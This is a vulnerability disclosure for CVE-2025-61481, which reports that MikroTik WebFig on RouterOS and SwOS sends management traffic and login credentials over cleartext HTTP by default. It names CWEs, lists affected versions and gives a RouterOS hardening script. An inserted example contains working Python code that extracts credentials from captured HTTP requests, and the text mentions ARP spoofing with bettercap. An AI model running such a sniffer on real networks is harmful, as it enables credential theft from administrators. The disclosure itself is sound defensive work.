CVE-2025-61481 – MikroTik / SwOS

When I was testing a CRS326-24G-2S+ running RouterOS 7.14.2, I noticed that it doesn’t use HTTPS by default. The management interface, WebFig, loads entirely over plain HTTP even after a factory reset.

I did a few quick tests and confirmed it with a packet capture. Every request, including the login credentials, is visible on the wire. The client-side script also keeps the username and password in sessionStorage across navigation, so they are exposed to any script running in the page as well as on the wire.

This kind of weak default configuration falls under common weakness categories (CWE-319: Cleartext Transmission of Sensitive Information, and generally weak management-plane protection). It’s the sort of thing that should be tracked and fixed, so I reported it to MITRE.

From an attacker's point of view, this is trivial to exploit. Anyone on the same network segment (for example after ARP spoofing with bettercap) or otherwise on the path between the administrator and the switch can intercept or modify the traffic with tools like mitmproxy or bettercap; simply capturing the credentials needs nothing more than tcpdump. It doesn't take anything advanced.
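To make "visible on the wire" concrete, here is an added example (not code from the original post and not a tool MikroTik ships): a minimal credential sniffer of the kind bettercap or mitmproxy automates. It takes raw HTTP request payloads, as tcpdump would hand them over from the management segment, and pulls logins out of form-encoded bodies, JSON bodies and HTTP Basic headers. The sample payloads, the host 192.168.88.1 and the field names are constructed for illustration; they are a generic login form, not a capture of WebFig's actual login exchange, whose field names this example does not assume.

```python
import base64
import json
from urllib.parse import parse_qs

# Field names that commonly carry a login.  WebFig's own field names are not
# assumed here; the sample bodies at the bottom are constructed.
CREDENTIAL_KEYS = {"user", "username", "name", "login",
                   "password", "passwd", "pwd", "pass"}


def parse_http_request(payload: bytes):
    """Split one raw HTTP/1.x request into (method, path, headers, body).

    Returns None for anything that is not an HTTP request (other protocols on
    the segment, mid-stream TCP segments, responses).
    """
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, path, _version = parts
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def extract_credentials(payload: bytes):
    """Return {'host', 'path', 'source', 'fields'} when the request carries a
    login in cleartext, otherwise None."""
    req = parse_http_request(payload)
    if req is None:
        return None
    method, path, headers, body = req
    hit = {"host": headers.get("host", "?"), "path": path}

    # HTTP Basic auth is base64, not encryption: decode it straight back.
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user, _, pwd = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
        except (ValueError, UnicodeDecodeError):
            return None
        hit.update(source="basic", fields={"username": user, "password": pwd})
        return hit

    if method != "POST":
        return None
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        fields = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
        source = "form"
    elif ctype.startswith("application/json"):
        try:
            doc = json.loads(body)
        except ValueError:
            return None
        fields = {k: str(v) for k, v in doc.items()} if isinstance(doc, dict) else {}
        source = "json"
    else:
        return None
    creds = {k: v for k, v in fields.items() if k.lower() in CREDENTIAL_KEYS}
    if not creds:
        return None
    hit.update(source=source, fields=creds)
    return hit


def find_cleartext_logins(payloads):
    """Run extract_credentials over every captured payload and keep the hits."""
    return [hit for hit in map(extract_credentials, payloads) if hit is not None]


# Constructed sample payloads (hypothetical, not a real WebFig capture): three
# requests that leak a login and one harmless GET.
SAMPLE_PAYLOADS = [
    b"POST /login HTTP/1.1\r\nHost: 192.168.88.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"name=admin&password=s3cret%21",
    b"POST /api/login HTTP/1.1\r\nHost: 192.168.88.1\r\n"
    b"Content-Type: application/json\r\n\r\n"
    b'{"username": "oliver", "password": "hunter2"}',
    b"GET /rest/system/resource HTTP/1.1\r\nHost: 192.168.88.1\r\n"
    b"Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n",
    b"GET /webfig/ HTTP/1.1\r\nHost: 192.168.88.1\r\n\r\n",
]

if __name__ == "__main__":
    for hit in find_cleartext_logins(SAMPLE_PAYLOADS):
        print(f"{hit['host']}{hit['path']} ({hit['source']}): {hit['fields']}")
```

On a real segment the payloads come from a capture (for example tcpdump on port 80 with TCP reassembly), and the same parser is what an attacker's tooling applies automatically; the point of the example is that no cryptanalysis is involved, only parsing.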

The behavior seems consistent across both RouterOS and SwOS. I only tested it on the CRS326-24G-2S+, but I’d expect other devices using the same WebFig component to act the same way.


Impact:
Management-plane credential exposure and potential tampering by an on-path attacker.

CWE       Name                                                          Explanation
CWE-1188  Initialization of a Resource with an Insecure Default         The WebFig service is initialized with HTTP as its default instead of HTTPS, exposing sensitive data.
CWE-319   Cleartext Transmission of Sensitive Information               Management traffic and credentials are sent over HTTP.
CWE-200   Exposure of Sensitive Information to an Unauthorized Actor    Credentials and actions can be observed by on-path attackers.

Affected versions:

  • RouterOS 7.14.2 (stable)
  • SwitchOS 2.18 (tested on CRS326-24G-2S+)
    Other models using the same WebFig component are probably affected as well.

Mitigation:
Keep management interfaces on a trusted, isolated network (a dedicated management VLAN that ordinary hosts cannot reach).
Where the platform allows it, enable HTTPS for WebFig (the www-ssl service in RouterOS) and disable the plain HTTP service, or reach the device only through a VPN tunnel.
Alternatively, manage the device over SSH or the TLS variant of the API (api-ssl) rather than the cleartext API.
Until MikroTik changes this default, treat every HTTP-only management interface as unencrypted and treat the credentials that pass over it as exposed.
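The RouterOS side of that mitigation, as an added configuration example (not from the original post and not MikroTik documentation): the weak default is left commented for comparison, then a certificate is created, bound to www-ssl, the service is restricted to the management network, and plain HTTP is switched off. The certificate name webfig-cert, the common name and the 192.168.88.0/24 management network are placeholders.

```routeros
# Weak default as shipped (shown for comparison, do not apply):
#   www     enabled on port 80, www-ssl disabled, no certificate bound.
# Inspect the current state first:
/ip service print

# 1. Create and self-sign a TLS server certificate for the device
#    (or import one issued by your own PKI instead of signing here).
/certificate add name=webfig-cert common-name=sw-core-01.example.net \
    key-usage=digital-signature,key-encipherment,tls-server days-valid=365
/certificate sign webfig-cert

# 2. Bind it to the HTTPS service and restrict that service to the
#    management network only.
/ip service set www-ssl certificate=webfig-cert address=192.168.88.0/24 disabled=no

# 3. Only now turn off plain HTTP, so you are not locked out between steps.
/ip service set www disabled=yes

# 4. Same treatment for the other cleartext management services.
/ip service set telnet disabled=yes
/ip service set ftp disabled=yes
/ip service set api disabled=yes
/ip service set ssh address=192.168.88.0/24

# 5. Confirm that nothing cleartext is left listening.
/ip service print
```

Two caveats: a self-signed certificate still lets an on-path attacker present their own on the first connection, so record the fingerprint out of band or issue the certificate from a CA your browsers trust; and these commands apply to RouterOS only, so on a switch booted into SwOS the network-isolation advice above is what remains.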

CVE: CVE-2025-61481

// Oliver
